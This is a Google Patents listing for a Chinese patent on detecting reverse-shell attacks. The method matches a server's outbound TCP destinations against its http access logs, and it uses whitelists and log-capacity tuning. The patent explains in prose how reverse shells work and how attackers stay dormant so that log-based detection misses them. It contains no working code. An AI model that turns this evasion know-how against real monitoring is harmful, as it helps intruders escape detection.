CN115801305B - Network attack detection and identification method and related equipment - Google Patents
Network attack detection and identification method and related equipment Download PDFInfo
- Publication number
- CN115801305B CN115801305B CN202211093082.XA CN202211093082A CN115801305B CN 115801305 B CN115801305 B CN 115801305B CN 202211093082 A CN202211093082 A CN 202211093082A CN 115801305 B CN115801305 B CN 115801305B
- Authority
- CN
- China
- Prior art keywords
- target
- address
- port
- tcp connection
- network
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000000034 method Methods 0.000 title claims abstract description 61
- 238000001514 detection method Methods 0.000 title claims abstract description 27
- 238000004590 computer program Methods 0.000 claims description 19
- 230000008859 change Effects 0.000 claims description 14
- 230000004044 response Effects 0.000 claims description 8
- 238000012544 monitoring process Methods 0.000 abstract description 9
- 238000010586 diagram Methods 0.000 description 11
- 230000006870 function Effects 0.000 description 7
- 230000008569 process Effects 0.000 description 7
- 238000012545 processing Methods 0.000 description 7
- 239000003795 chemical substances by application Substances 0.000 description 5
- 230000005059 dormancy Effects 0.000 description 4
- 230000008901 benefit Effects 0.000 description 3
- 238000004891 communication Methods 0.000 description 3
- 230000008878 coupling Effects 0.000 description 3
- 238000010168 coupling process Methods 0.000 description 3
- 238000005859 coupling reaction Methods 0.000 description 3
- 230000003287 optical effect Effects 0.000 description 3
- 238000007726 management method Methods 0.000 description 2
- 238000012986 modification Methods 0.000 description 2
- 230000004048 modification Effects 0.000 description 2
- 230000002159 abnormal effect Effects 0.000 description 1
- 238000004458 analytical method Methods 0.000 description 1
- 238000013500 data storage Methods 0.000 description 1
- 239000000835 fiber Substances 0.000 description 1
- 230000010354 integration Effects 0.000 description 1
- 230000009545 invasion Effects 0.000 description 1
- 238000004519 manufacturing process Methods 0.000 description 1
- 239000004065 semiconductor Substances 0.000 description 1
- 239000007787 solid Substances 0.000 description 1
- 238000006467 substitution reaction Methods 0.000 description 1
Classifications
-
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D30/00—Reducing energy consumption in communication networks
- Y02D30/50—Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate
Landscapes
- Data Exchanges In Wide-Area Networks (AREA)
- Computer And Data Communications (AREA)
Abstract
The application discloses a network attack detection and identification method and related equipment. The method comprises the following steps: acquiring a target port and a target IP address based on a TCP connection message sent by a target server; and backtracking the target port and the target IP address according to the http access log to determine the network risk of the TCP connection message. According to the network attack detection and identification method provided by the embodiment of the application, the TCP connection message sent by the target server is analyzed to obtain the target port and the target IP address by monitoring the network request and the flow condition in real time at the server, and the risk of rebound shell exists in the TCP connection message is determined by backtracking and comparing the TCP connection message with the port and the IP address of the external network request recorded in the http access log, so that the authority problem that an administrator needs to monitor in batch deployment agent of the client of the target server in the prior art can be effectively solved, the problem of diversity of rebound shell monitoring processes in the prior art is solved, and the universality of the method is improved.
Description
Technical Field
The present disclosure relates to the field of communications, and more particularly, to a method and related device for detecting and identifying a network attack.
Background
In the current monitoring method, a agent process is deployed to a server at each client, and a key process of the server is monitored to perform risk determination. The method can not realize unified monitoring and network risk judgment of the clients by the server, and meanwhile, the method needs to deploy agent processes for each client, and deployment is difficult under the condition that the number of the clients subordinate to the server is large.
Disclosure of Invention
In the summary, a series of concepts in a simplified form are introduced, which will be further described in detail in the detailed description. The summary of the application is not intended to define the key features and essential features of the claimed subject matter, nor is it intended to be used as an aid in determining the scope of the claimed subject matter.
In order to provide a more convenient and rapid network attack detection and identification method, in a first aspect, the application provides a network attack detection and identification method, which comprises the following steps:
acquiring a target port and a target IP address based on a TCP connection message sent by a target server;
and backtracking the target port and the target IP address according to the http access log to determine the network risk of the TCP connection message.
Optionally, the tracing back the destination port and the destination IP address according to the http access log to determine a network risk of the TCP connection packet includes:
and under the condition that the http access request with the same target port and target IP address exists in the http access log, sending out network intrusion risk early warning based on the TCP connection message.
Optionally, the method further comprises:
identifying a target port and a target IP address corresponding to the TCP connection message based on a local preset white list;
and under the condition that the same target port and the same target IP address exist in the local preset white list, the TCP connection message has no network intrusion risk.
Optionally, the method further comprises:
obtaining an http response message of a target server;
acquiring a source port and a source IP address based on the http response message;
and carrying out risk identification on the network request sent by the source port and the source IP address based on a cloud database to obtain the local preset white list, wherein the cloud database comprises a white list and/or a black list of the destination IP address and the destination source port.
Optionally, the method further comprises:
acquiring network attack frequencies of other servers in the target area within a preset time length;
and adjusting the capacity of the http access log based on the network attack frequency.
Optionally, the method further comprises:
counting the access frequency of the same port and/or IP address in the http access log;
and adjusting the life cycle of the log information corresponding to the port and/or the IP address based on the access frequency.
Optionally, the method further comprises:
acquiring flow change information of the target server;
and when the flow change information exceeds a preset threshold value, improving the capacity of the http access log.
In a second aspect, the present application further provides a device for detecting and identifying a network attack, including:
the acquisition unit is used for acquiring the target port and the target IP address based on the TCP connection message sent by the target server;
and the determining unit is used for backtracking the target port and the target IP address according to the http access log so as to determine the network risk of the TCP connection message.
In a third aspect, an electronic device, comprising: the method comprises the steps of a memory, a processor and a computer program stored in the memory and capable of running on the processor, wherein the processor is used for realizing the network attack detection and identification method according to any one of the first aspects when executing the computer program stored in the memory.
In a fourth aspect, the present application further proposes a computer readable storage medium having stored thereon a computer program which, when executed by a processor, implements the method for detecting and identifying a network attack according to any of the first aspects.
In summary, the method for detecting and identifying network attacks according to the embodiment of the application comprises the following steps: acquiring a target port and a target IP address based on a TCP connection message sent by a target server; and backtracking the target port and the target IP address according to the http access log to determine the network risk of the TCP connection message. According to the network attack detection and identification method provided by the embodiment of the application, the TCP connection message sent by the target server is analyzed to obtain the target port and the target IP address by monitoring the network request and the flow condition in real time at the server, the port and the IP address of the external network request recorded in the http access log are traced and compared to determine whether the TCP connection message has the risk of bouncing shell, and the network request is monitored at the server, so that the authority problem that an administrator needs to monitor in batch deployment of agents at the client of the target server in the prior art is effectively solved, the problem of the diversity of the bouncing shell monitoring process in the prior art is solved, and the universality of the method is improved.
Additional advantages, objects, and features of the application will be set forth in part in the description which follows and in part will become apparent to those having ordinary skill in the art upon examination of the following or may be learned from practice of the application.
Drawings
Various other advantages and benefits will become apparent to those of ordinary skill in the art upon reading the following detailed description of the preferred embodiments. The drawings are only for purposes of illustrating the preferred embodiments and are not to be construed as limiting the specification. Also, like reference numerals are used to designate like parts throughout the figures. In the drawings:
fig. 1 is a schematic flow chart of a method for detecting and identifying network attacks according to an embodiment of the present application;
fig. 2 is a schematic diagram of a detection and identification working principle of a network attack according to an embodiment of the present application;
fig. 3 is a schematic diagram of a working principle of a server external learning module according to an embodiment of the present application;
fig. 4 is a schematic diagram of an operating principle of a rebound shell detection module according to an embodiment of the present application;
fig. 5 is a schematic structural diagram of a detection and identification device for network attack according to an embodiment of the present application;
fig. 6 is a schematic structural diagram of an electronic device for detecting and identifying a network attack according to an embodiment of the present application.
Detailed Description
According to the network attack detection and identification method provided by the embodiment of the application, the TCP connection message sent by the target server is analyzed to obtain the target port and the target IP address by monitoring the network request and the flow condition in real time at the server, the port and the IP address of the external network request recorded in the http access log are traced and compared to determine whether the TCP connection message has the risk of bouncing shell, and the network request is monitored at the server, so that the authority problem that an administrator needs to monitor in batch deployment of agents at the client of the target server in the prior art is effectively solved, the problem of the diversity of the bouncing shell monitoring process in the prior art is solved, and the universality of the method is improved.
The terms "first," "second," "third," "fourth" and the like in the description and in the claims and in the above drawings, if any, are used for distinguishing between similar objects and not necessarily for describing a particular sequential or chronological order. It is to be understood that the data so used may be interchanged where appropriate such that the embodiments described herein may be implemented in other sequences than those illustrated or otherwise described herein. Furthermore, the terms "comprises," "comprising," and "having," and any variations thereof, are intended to cover a non-exclusive inclusion, such that a process, method, system, article, or apparatus that comprises a list of steps or elements is not necessarily limited to those steps or elements expressly listed but may include other steps or elements not expressly listed or inherent to such process, method, article, or apparatus. The following description of the embodiments of the present application will be made clearly and completely with reference to the accompanying drawings, in which it is apparent that the embodiments described are only some embodiments of the present application, but not all embodiments.
The target host is in an intranet environment and cannot be directly accessed by an extranet, and only the shell can be bounced out actively, and the mode is called rebound shell. The bounce shell (reverse shell) is that the control end monitors a certain TCP/UDP port, the controlled end initiates a request to the port, and the input and output of the command line are transferred to the control end, which is essentially the role reversal of the client and the server of the network concept.
Referring to fig. 1, a flowchart of a method for detecting and identifying a network attack according to an embodiment of the present application may specifically include:
s110, acquiring a target port and a target IP address based on a TCP connection message sent by a target server;
for example, when an attacker attacks a target server, the attacker first sends a section of attack instruction to the target server, where the attack instruction includes an IP address and a port that the target server needs to be externally connected. If the target server is connected with the IP address and the port provided by the attacker, the target server can be connected with the attacker, and the attacker can remotely control the shell of the server, so that the aim of invading the target server is fulfilled.
The proposal provided by the application detects the flow at the server end, monitors the network request of the client end subordinate to the server, and analyzes the target port and the target IP address which are required to be sent in the TCP message under the condition that the TCP connection message is required to be sent to the external network.
And S120, backtracking the target port and the target IP address according to the http access log to determine the network risk of the TCP connection message.
The http access log records a history of the intranet accessed by the external network, including the port information and the IP address information of the visitor, and of course, also includes the port information and the IP address information of the attacker, by comparing the port information and the IP address information recorded in the http access log with the target port and the target IP address to be connected to the TCP connection message, if the target port and the target IP address corresponding to the TCP connection message are the same as those in the http access log, a rebound shell event exists, and the target server is very likely to be attacked.
In summary, according to the detection and identification method for network attack provided by the embodiment of the application, the network request and the traffic condition are monitored at the server side, the TCP connection message sent by the target server is analyzed to obtain the target port and the target IP address, the port and the IP address of the external network request recorded in the http access log are traced and compared, whether the risk of the rebound shell exists in the TCP connection message is determined, and the traffic is monitored at the server side, so that the authority problem that an administrator needs to monitor in batch deployment of agents at the client side of the target server in the prior art is effectively solved, meanwhile, the problem of the diversity of rebound monitoring processes in the prior art is solved, and the universality of the method is improved.
In some examples, the tracing back the destination port and the destination IP address according to the http access log to determine the network risk of the TCP connection packet includes:
and under the condition that the http access request with the same target port and target IP address exists in the http access log, sending out network intrusion risk early warning based on the TCP connection message.
By way of example, the target port and the target IP address, which are correspondingly connected with the TCP connection message, are compared through the IP address and the port recorded in the http access log, and if the same is found, the TCP connection message sends out a network intrusion risk early warning.
For example: intranet web host 192.168.1.50, initiates a TCP request to access the 8888 port of external host 42.123.1.20. And according to the current memory capacity of the device, reading the http access logs with the specified quantity, backtracking, checking whether the keywords 42.123.1.20:8888 exist in the history log, if so, recording the corresponding log, and pushing an alarm. Pushing the detection and identification of network attacks as shown in table 1 if there is a risk:
TABLE 1
The network attack detection and identification records early warning time, source IP, source port, destination IP, destination port, intranet asset, threat type and risk session sent by the extranet.
In some examples, the above method further comprises:
identifying a target port and a target IP address corresponding to the TCP connection message based on a local preset white list;
and under the condition that the same target port and the same target IP address exist in the local preset white list, the TCP connection message has no network intrusion risk.
For example, before the TCP connection message is backtracked and analyzed by using the http log, the target port and the target IP address corresponding to the TCP connection message may be first identified by a preset white list stored locally, and if the port and the IP address which are the same as the target port and the target IP address corresponding to the TCP connection message exist in the preset white list, the TCP connection message may be trusted and there is no risk of network intrusion.
In summary, according to the method for detecting and identifying network attack provided by the embodiment of the application, before the TCP connection message is compared by using the http log in a retrospective analysis manner, the destination port corresponding to the TCP connection message and the destination IP corresponding to the TCP connection message can be compared for the first time through the white list, and if the destination port and the destination IP fall into the preset white list, the TCP connection message is directly passed through.
In some examples, the above method further comprises:
obtaining an http response message of a target server;
acquiring a source port and a source IP address based on the http response message;
and carrying out risk identification on the network request sent by the source port and the source IP address based on a cloud database to obtain the local preset white list, wherein the cloud database comprises a white list and/or a black list of the destination IP address and the destination source port.
For example, when the target server is connected to the external network, risk identification may be performed on a network request of the external network according to a white list and/or a black list stored in the cloud database, where the white list includes a destination IP address and a destination source port, and a local preset white list of the internal network is established according to the identification, for example: starting server external connection learning, configuring and selecting an intranet host 192.168.1.50, setting learning time to be 1 day, recording a target IP corresponding to a target website when the server accesses the target website, comparing the target IP with threat information, and storing the corresponding IP and port to a white list if threat does not exist.
In summary, the method for detecting and identifying network attacks provided by the embodiment of the application can start the external learning function of the server for the target server according to the requirement and autonomously set the learning time range. And the intranet web host actively requests the session of the external network within a preset time range, compares the session with the IP address in the cloud database and the white list and/or the black list of the destination source port, stores and establishes a local preset white list, and directly generates threat logs and alarms if the destination IP has threat labels.
The http access log is generally set to a fixed capacity, and when the access log is full, the record with the earlier access log forming time is erased, and the information corresponding to the newly generated session request is recorded in the log. When an attacker sends out an attack instruction, the attacker can send out a dormancy instruction to the client corresponding to the intranet server under attack, and after the information corresponding to the attack instruction in the http access log expires, the client and the attacker are connected, so that the security detection is avoided in a backtracking mode based on the http access log, and the successful invasion is achieved.
In order to solve the above-mentioned phenomenon, the validity of network detection can be improved by obtaining a combination form of a plurality of schemes through any scheme in the following A, B and C.
In some examples, the above method further comprises:
scheme a:
acquiring network attack frequencies of other servers in the target area within a preset time length;
and adjusting the capacity of the http access log based on the network attack frequency.
For example, the network attack frequency of other servers in the target area in a preset time period is counted, for example, the target area may be a whole office building, and the preset time period may be set to 1 hour, that is, the number of times that the office building is subjected to network attack in the past hour, that is, the network attack frequency is counted. If the frequency of network attack is not higher than the preset frequency, the capacity of the http access log can not be adjusted, if the frequency is higher than the preset frequency, the capacity of the http access log can be properly improved, and the higher the frequency value is, the higher the capacity of the http access log is, so that the possibility that an attacker gives a dormancy instruction to a client side to skip the security detection problem is reduced.
Scheme B:
counting the access frequency of the same port and/or IP address in the http access log;
and adjusting the life cycle of the log information corresponding to the port and/or the IP address based on the access frequency.
Illustratively, if access frequencies of the same port and/or IP address in the http access log are counted, and access requests are granted to the port or the IP address frequently, and the access requests are not in the white list, then the risk factor of the network request is high, which may be a frequently-probed attacker. And (3) adjusting the life cycle of the port and/or the IP address corresponding to the log information according to the access frequency, namely if the access frequency is higher, if the capacity of the http access log is insufficient, preferentially erasing other historical access information with lower frequency.
Scheme C:
acquiring flow change information of the target server;
and when the flow change information exceeds a preset threshold value, improving the capacity of the http access log.
The method includes the steps of obtaining flow change information of a target server, wherein the flow change information is a result of comparing current flow information with historical flow information in a current time period, and the historical flow information is a result of counting change conditions of average flow of the target server over time on a plurality of natural days, and generally shows regularity, for example, more flows are generated in working hours and less flows are generated in working hours. Under normal conditions, the traffic change information does not exceed the preset threshold, that is, the daily traffic condition should be approximately the same, but when the traffic change information exceeds the preset threshold, some network abnormal events may occur, such as an external network attack, at this time, the capacity of the http access log is increased, so that the possibility that an attacker gives a dormancy instruction to a client to skip the security detection problem is reduced.
In summary, according to the detection and identification method for network attack provided by the embodiment of the application, the life cycle of the log information obtained by the capacity of the access log is adjusted by analyzing one or more of the network attack frequency, the access frequency of the same port and/or the IP address and the traffic change information, so that the possibility that an attacker gives a dormancy instruction to a client to skip the security detection problem is reduced, the detection and identification accuracy of the network attack is improved, and the network security of a server is improved.
In some examples, as shown in fig. 3, early warning can be made on network risks through an asset management module, a server external learning module, a threat information module, a rebound shell detection module and an alarm module, and the server external learning module is mainly used for marking an external address and a port white list in combination with threat information, carrying out log backtracking on the IP and the port of the non-white list requested by the server, decoding the log and judging whether related shell rebound events exist or not to make risk early warning.
The asset management module may passively identify intranet web assets by manual addition or by traffic. And identifying and matching response fields in the http service according to application identification, and automatically identifying a web server in an intranet according to the manually configured intranet network segment. Such as: and configuring the intranet network segment as 192.168.1.0/24, and recording the corresponding IP and port if http response data exists in the traffic. Such as 192.168.1.50:80.
The server external learning module starts the server external learning function and the learning time range according to the requirements. As shown in fig. 4, after the web host in the time range actively requests the session and the threat information are compared, the white list storage of the destination IP and the destination port is performed. If the target IP has a threat label, a threat log and an alarm are directly generated. Such as: and starting server external connection learning, configuring and selecting an intranet host 192.168.1.50, wherein the learning time is day, and when the server accesses http:// www.baidu.com, recording a target IP, comparing the target IP with threat information, and storing the corresponding IP and port to a white list.
And the rebound shell detection module judges whether the target IP and the port are white list or not after a request initiated by the web host exists. As shown in fig. 4: intranet web host 192.168.1.50, initiates a tcp request to access the 8888 port of host 42.123.1.20. The first step: checking purpose IP:42.123.1.20, destination port 8888, whether on a white list. If hit white list, then end matching. Otherwise, the next step is carried out. And secondly, reading the http access logs with the specified quantity according to the current memory capacity of the device and backtracking. And thirdly, checking whether the keywords 42.123.1.20:8888 exist in the history log, if so, recording the corresponding log, and pushing an alarm.
Referring to fig. 5, an embodiment of a network attack detection and identification device according to an embodiment of the present application may include:
an obtaining unit 21, configured to obtain a target port and a target IP address based on a TCP connection message sent by a target server;
and the determining unit 22 is configured to trace back the destination port and the destination IP address according to the http access log to determine a network risk of the TCP connection packet.
As shown in fig. 6, an embodiment of the present application further provides an electronic device 300, including a memory 310, a processor 320, and a computer program 311 stored in the memory 310 and capable of running on the processor, where the processor 320 implements any one of the steps of the method for detecting and identifying a network attack when the processor 320 executes the computer program 311.
Since the electronic device described in this embodiment is a device for implementing a method for detecting and identifying a network attack in this embodiment of the present application, based on the method described in this embodiment of the present application, those skilled in the art can understand the specific implementation of the electronic device in this embodiment and various modifications thereof, so how the electronic device implements the method in this embodiment of the present application will not be described in detail herein, and only those devices employed by those skilled in the art for implementing the method in this embodiment of the present application are within the scope of the present application to be protected.
In a specific implementation, the computer program 311 may implement any of the embodiments corresponding to fig. 1 when executed by a processor.
In the foregoing embodiments, the descriptions of the embodiments are focused on, and for those portions of one embodiment that are not described in detail, reference may be made to the related descriptions of other embodiments.
It will be appreciated by those skilled in the art that embodiments of the present application may be provided as a method, system, or computer program product. Accordingly, the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, the present application may take the form of a computer program product embodied on one or more computer-usable storage media (including, but not limited to, disk storage, CD-ROM, optical storage, and the like) having computer-usable program code embodied therein.
The present application is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems) and computer program products according to embodiments of the application. It will be understood that each flow and/or block of the flowchart illustrations and/or block diagrams, and combinations of flows and/or blocks in the flowchart illustrations and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded computer, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
Embodiments of the present application also provide a computer program product comprising computer software instructions which, when run on a processing device, cause the processing device to perform a flow of detection and identification of a network attack as in the corresponding embodiment of fig. 1.
The computer program product includes one or more computer instructions. When the computer program instructions are loaded and executed on a computer, the processes or functions in accordance with embodiments of the present application are produced in whole or in part. The computer may be a general purpose computer, a special purpose computer, a computer network, or other programmable apparatus. The computer instructions may be stored in a computer-readable storage medium or transmitted from one computer-readable storage medium to another computer-readable storage medium, for example, the computer instructions may be transmitted from one website, computer, server, or data center to another website, computer, server, or data center by a wired (e.g., coaxial cable, fiber optic, digital subscriber line (digital subscriber line, DSL)) or wireless (e.g., infrared, wireless, microwave, etc.). Computer readable storage media can be any available media that can be stored by a computer or data storage devices such as servers, data centers, etc. that contain an integration of one or more available media. Usable media may be magnetic media (e.g., floppy disks, hard disks, magnetic tapes), optical media (e.g., DVDs), or semiconductor media (e.g., solid State Disks (SSDs)), among others.
It will be clear to those skilled in the art that, for convenience and brevity of description, specific working procedures of the above-described systems, apparatuses and units may refer to corresponding procedures in the foregoing method embodiments, which are not repeated herein.
In the several embodiments provided in the present application, it should be understood that the disclosed systems, devices, and methods may be implemented in other manners. For example, the apparatus embodiments described above are merely illustrative, e.g., the division of elements is merely a logical functional division, and there may be additional divisions of actual implementation, e.g., multiple elements or components may be combined or integrated into another system, or some features may be omitted, or not performed. Alternatively, the coupling or direct coupling or communication connection shown or discussed with each other may be an indirect coupling or communication connection via some interfaces, devices or units, which may be in electrical, mechanical or other form.
The units described as separate units may or may not be physically separate, and units shown as units may or may not be physical units, may be located in one place, or may be distributed over a plurality of network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, each functional unit in the embodiments of the present application may be integrated in one processing unit, or each unit may exist alone physically, or two or more units may be integrated in one unit. The integrated units may be implemented in hardware or in software functional units.
The integrated units, if implemented in the form of software functional units and sold or used as stand-alone products, may be stored in a computer readable storage medium. Based on such understanding, the technical solution of the present application may be embodied in essence or a part contributing to the prior art or all or part of the technical solution in the form of a software product stored in a storage medium, including several instructions for causing a computer device (which may be a personal computer, a server, or a network device, etc.) to perform all or part of the steps of the methods of the embodiments of the present application. And the aforementioned storage medium includes: a U-disk, a removable hard disk, a Read-Only Memory (ROM), a random access Memory (Random Access Memory, RAM), a magnetic disk, or an optical disk, or other various media capable of storing program codes.
The above embodiments are only for illustrating the technical solution of the present application, and not for limiting the same; although the application has been described in detail with reference to the foregoing embodiments, it will be understood by those of ordinary skill in the art that: the technical scheme described in the foregoing embodiments can be modified or some technical features thereof can be replaced by equivalents; such modifications and substitutions do not depart from the spirit and scope of the technical solutions of the embodiments of the present application.
Claims (5)
1. A method for detecting and identifying a network attack, comprising:
acquiring a target port and a target IP address based on a TCP connection message sent by a target server;
backtracking the target port and the target IP address according to the http access log to determine the network risk of the TCP connection message;
further comprises:
acquiring network attack frequencies of other servers in the target area within a preset time length;
adjusting the capacity of the http access log based on the network attack frequency;
further comprises:
counting the access frequency of the same port and/or IP address in the http access log;
adjusting the life cycle of the log information corresponding to the port and/or the IP address based on the access frequency;
further comprises:
acquiring flow change information of the target server;
when the flow change information exceeds a preset threshold value, the capacity of the http access log is improved;
the backtracking the target port and the target IP address according to the http access log to determine the network risk of the TCP connection packet, including:
under the condition that http access requests with the same target port and target IP address exist in the http access log, network intrusion risk early warning is sent based on the TCP connection message;
further comprises:
identifying a target port and a target IP address corresponding to the TCP connection message based on a local preset white list;
and under the condition that the same target port and the same target IP address exist in the local preset white list, the TCP connection message has no network intrusion risk.
2. The method as recited in claim 1, further comprising:
obtaining an http response message of a target server;
acquiring a source port and a source IP address based on the http response message;
and carrying out risk identification on the network request sent by the source port and the source IP address based on a cloud database to acquire the local preset white list, wherein the cloud database comprises a white list and/or a black list of the destination IP address and the destination source port.
3. A device for detecting and identifying a network attack, comprising:
the acquisition unit is used for acquiring the target port and the target IP address based on the TCP connection message sent by the target server;
the determining unit is used for backtracking the target port and the target IP address according to the http access log so as to determine the network risk of the TCP connection message;
further comprises:
acquiring network attack frequencies of other servers in the target area within a preset time length;
adjusting the capacity of the http access log based on the network attack frequency;
further comprises:
counting the access frequency of the same port and/or IP address in the http access log;
adjusting the life cycle of the log information corresponding to the port and/or the IP address based on the access frequency;
further comprises:
acquiring flow change information of the target server;
when the flow change information exceeds a preset threshold value, the capacity of the http access log is improved;
the backtracking the target port and the target IP address according to the http access log to determine the network risk of the TCP connection packet, including:
under the condition that http access requests with the same target port and target IP address exist in the http access log, network intrusion risk early warning is sent based on the TCP connection message;
further comprises:
identifying a target port and a target IP address corresponding to the TCP connection message based on a local preset white list;
and under the condition that the same target port and the same target IP address exist in the local preset white list, the TCP connection message has no network intrusion risk.
4. An electronic device, comprising: memory and processor, characterized in that the processor is adapted to implement the steps of the network attack detection and identification method according to any of claims 1 or 2 when executing a computer program stored in the memory.
5. A computer-readable storage medium having stored thereon a computer program, characterized by: the computer program, when executed by a processor, implements a method for detecting and identifying a network attack according to any of claims 1 or 2.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202211093082.XA CN115801305B (en) | 2022-09-08 | 2022-09-08 | Network attack detection and identification method and related equipment |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202211093082.XA CN115801305B (en) | 2022-09-08 | 2022-09-08 | Network attack detection and identification method and related equipment |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN115801305A CN115801305A (en) | 2023-03-14 |
| CN115801305B true CN115801305B (en) | 2023-11-07 |
Family
ID=85431798
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202211093082.XA Active CN115801305B (en) | 2022-09-08 | 2022-09-08 | Network attack detection and identification method and related equipment |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN115801305B (en) |
Families Citing this family (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN116112295B (en) * | 2023-04-12 | 2023-07-04 | 北京长亭未来科技有限公司 | Method and device for researching and judging external connection type attack result |
Citations (14)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103038652A (en) * | 2010-05-25 | 2013-04-10 | 海德沃特合作I有限公司 | Device-assisted services for protecting network capacity |
| WO2017018377A1 (en) * | 2015-07-30 | 2017-02-02 | 日本電信電話株式会社 | Analysis method, analysis device, and analysis program |
| CN106572083A (en) * | 2016-10-18 | 2017-04-19 | 汉柏科技有限公司 | Log processing method and system |
| CN107102795A (en) * | 2017-05-31 | 2017-08-29 | 努比亚技术有限公司 | A kind of log recording method, mobile terminal and computer-readable recording medium |
| CN107231365A (en) * | 2017-06-13 | 2017-10-03 | 深信服科技股份有限公司 | The method and server and fire wall of a kind of evidence obtaining |
| CN110098957A (en) * | 2019-04-04 | 2019-08-06 | 北京市天元网络技术股份有限公司 | Big data analysis system based on network log |
| CN110493165A (en) * | 2018-06-29 | 2019-11-22 | 厦门白山耘科技有限公司 | Automatically determine the method, apparatus and Network Intrusion Detection System of hostile network process |
| CN110764969A (en) * | 2019-10-25 | 2020-02-07 | 新华三信息安全技术有限公司 | Network attack tracing method and device |
| CN111031009A (en) * | 2019-11-25 | 2020-04-17 | 杭州安恒信息技术股份有限公司 | Multilayer-based NOSQL injection attack detection method and device |
| CN113037689A (en) * | 2019-12-24 | 2021-06-25 | 中国移动通信集团河北有限公司 | Log-based virus discovery method and device, computing equipment and storage medium |
| CN113722284A (en) * | 2021-07-30 | 2021-11-30 | 济南浪潮数据技术有限公司 | Cluster log storage method, device, equipment and medium |
| CN113761527A (en) * | 2020-07-01 | 2021-12-07 | 北京沃东天骏信息技术有限公司 | Rebound shell process detection method, device, equipment and storage medium |
| CN113992341A (en) * | 2021-09-09 | 2022-01-28 | 新华三信息安全技术有限公司 | Message processing method and device |
| CN114153714A (en) * | 2021-12-01 | 2022-03-08 | 招商局金融科技有限公司 | Log information based capacity adjustment method, device, equipment and storage medium |
Family Cites Families (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US10243854B2 (en) * | 2015-12-09 | 2019-03-26 | International Business Machines Corporation | Persistent connection rebalancing |
-
2022
- 2022-09-08 CN CN202211093082.XA patent/CN115801305B/en active Active
Patent Citations (14)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103038652A (en) * | 2010-05-25 | 2013-04-10 | 海德沃特合作I有限公司 | Device-assisted services for protecting network capacity |
| WO2017018377A1 (en) * | 2015-07-30 | 2017-02-02 | 日本電信電話株式会社 | Analysis method, analysis device, and analysis program |
| CN106572083A (en) * | 2016-10-18 | 2017-04-19 | 汉柏科技有限公司 | Log processing method and system |
| CN107102795A (en) * | 2017-05-31 | 2017-08-29 | 努比亚技术有限公司 | A kind of log recording method, mobile terminal and computer-readable recording medium |
| CN107231365A (en) * | 2017-06-13 | 2017-10-03 | 深信服科技股份有限公司 | The method and server and fire wall of a kind of evidence obtaining |
| CN110493165A (en) * | 2018-06-29 | 2019-11-22 | 厦门白山耘科技有限公司 | Automatically determine the method, apparatus and Network Intrusion Detection System of hostile network process |
| CN110098957A (en) * | 2019-04-04 | 2019-08-06 | 北京市天元网络技术股份有限公司 | Big data analysis system based on network log |
| CN110764969A (en) * | 2019-10-25 | 2020-02-07 | 新华三信息安全技术有限公司 | Network attack tracing method and device |
| CN111031009A (en) * | 2019-11-25 | 2020-04-17 | 杭州安恒信息技术股份有限公司 | Multilayer-based NOSQL injection attack detection method and device |
| CN113037689A (en) * | 2019-12-24 | 2021-06-25 | 中国移动通信集团河北有限公司 | Log-based virus discovery method and device, computing equipment and storage medium |
| CN113761527A (en) * | 2020-07-01 | 2021-12-07 | 北京沃东天骏信息技术有限公司 | Rebound shell process detection method, device, equipment and storage medium |
| CN113722284A (en) * | 2021-07-30 | 2021-11-30 | 济南浪潮数据技术有限公司 | Cluster log storage method, device, equipment and medium |
| CN113992341A (en) * | 2021-09-09 | 2022-01-28 | 新华三信息安全技术有限公司 | Message processing method and device |
| CN114153714A (en) * | 2021-12-01 | 2022-03-08 | 招商局金融科技有限公司 | Log information based capacity adjustment method, device, equipment and storage medium |
Non-Patent Citations (1)
| Title |
|---|
| 某中型企业数据中心日志分析系统的设计与实现;王霄;中国优秀硕士学位论文全文数据库 信息科技辑;全文 * |
Also Published As
| Publication number | Publication date |
|---|---|
| CN115801305A (en) | 2023-03-14 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US11316878B2 (en) | System and method for malware detection | |
